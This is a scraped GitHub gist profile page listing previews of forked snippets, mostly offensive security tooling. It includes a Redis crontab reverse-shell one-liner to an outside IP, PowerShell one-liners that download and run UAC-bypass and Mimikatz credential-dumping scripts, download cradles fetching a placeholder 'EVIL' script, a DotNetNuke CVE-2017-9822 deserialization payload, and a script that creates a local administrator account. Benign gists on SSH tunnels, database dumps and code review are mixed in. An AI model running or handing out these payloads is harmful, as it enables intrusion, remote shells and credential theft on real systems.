Skip to content

Instantly share code, notes, and snippets.

View bravery9's full-sized avatar

bravery9

View GitHub Profile
@bravery9
bravery9 / socks-proxy.md
Created June 26, 2019 03:29 — forked from holmberd/socks-proxy.md
Configure remote SSH service and set up local SSH SOCKS proxy tunnel

REMOTE: Set up SSH service on the remote host

  • Skip if already set up, check with: sudo service ssh status
  • sudo apt-get install ssh
  • Edit ssh config file with the lines below: sudo vim /etc/ssh/sshd_config
PermitRootLogin no              #Disable direct login from root
AllowUsers user1 user2 user3    #*Only* allow this users to connect
AllowTcpForwarding yes          #Required to setup the tunnel, yes or commented out
PubkeyAuthentication yes        #Enables public key authentication
Port 22                         #Listening port of the server
@bravery9
bravery9 / gist:09808598a73316cdce163bd13fe32fa8
Created May 23, 2019 09:19 — forked from carnal0wnage/gist:df7082a56f1d7bc9681ceb3fea65c0fe
redis crontab shell
redis-cli flushall
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save
from https://phpinfo.me/2016/07/07/1275.html
@bravery9
bravery9 / RedTeam_CheatSheet.ps1
Created May 6, 2019 01:31 — forked from jivoi/RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@bravery9
bravery9 / DownloadCradles.ps1
Created May 6, 2019 01:30 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@bravery9
bravery9 / tor.py
Created February 15, 2019 02:44 — forked from jefftriplett/tor.py
Python Requests + Tor (Socks5)
"""
setup:
pip install requests
pip install requests[socks]
super helpful:
- http://packetforger.wordpress.com/2013/08/27/pythons-requests-module-with-socks-support-requesocks/
- http://docs.python-requests.org/en/master/user/advanced/#proxies
"""
@bravery9
bravery9 / ReadFile.xml
Created November 2, 2018 09:53 — forked from pwntester/ReadFile.xml
DotNetNuke (CVE-2017-9822) Payloads
<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:/windows/win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>
@bravery9
bravery9 / gist:fb1bff7ba4040700a1917a5ea4cc45e6
Created April 13, 2018 17:32 — forked from carnal0wnage/gist:606c41ac6ec40bf5c69d4db96d9312e3
Red Team Books
From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
@bravery9
bravery9 / Create-Administrator.ps1
Created February 25, 2018 17:46 — forked from ducas/Create-Administrator.ps1
Create a local administrator account using PowerShell
$Username = "su"
$Password = "password"
$group = "Administrators"
$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
$existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
if ($existing -eq $null) {
@bravery9
bravery9 / mysqldump.php
Created February 24, 2018 13:39 — forked from micc83/mysqldump.php
Simple PHP script to dump a MySql database
<?php
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
$database = 'db';
$user = 'user';
$pass = 'pass';
$host = 'localhost';
@bravery9
bravery9 / code-review-checklist.md
Created January 13, 2018 15:38 — forked from nerandell/code-review-checklist.md
PHP Code Review Guidelines

Make sure these boxes are checked before submitting/approving the PR

General

  • The code works
  • The code is easy to understand
  • Follows coding conventions
  • Names are simple and if possible short
  • Names are spelt correctly
  • Names contain units where applicable
  • There are no usages of magic numbers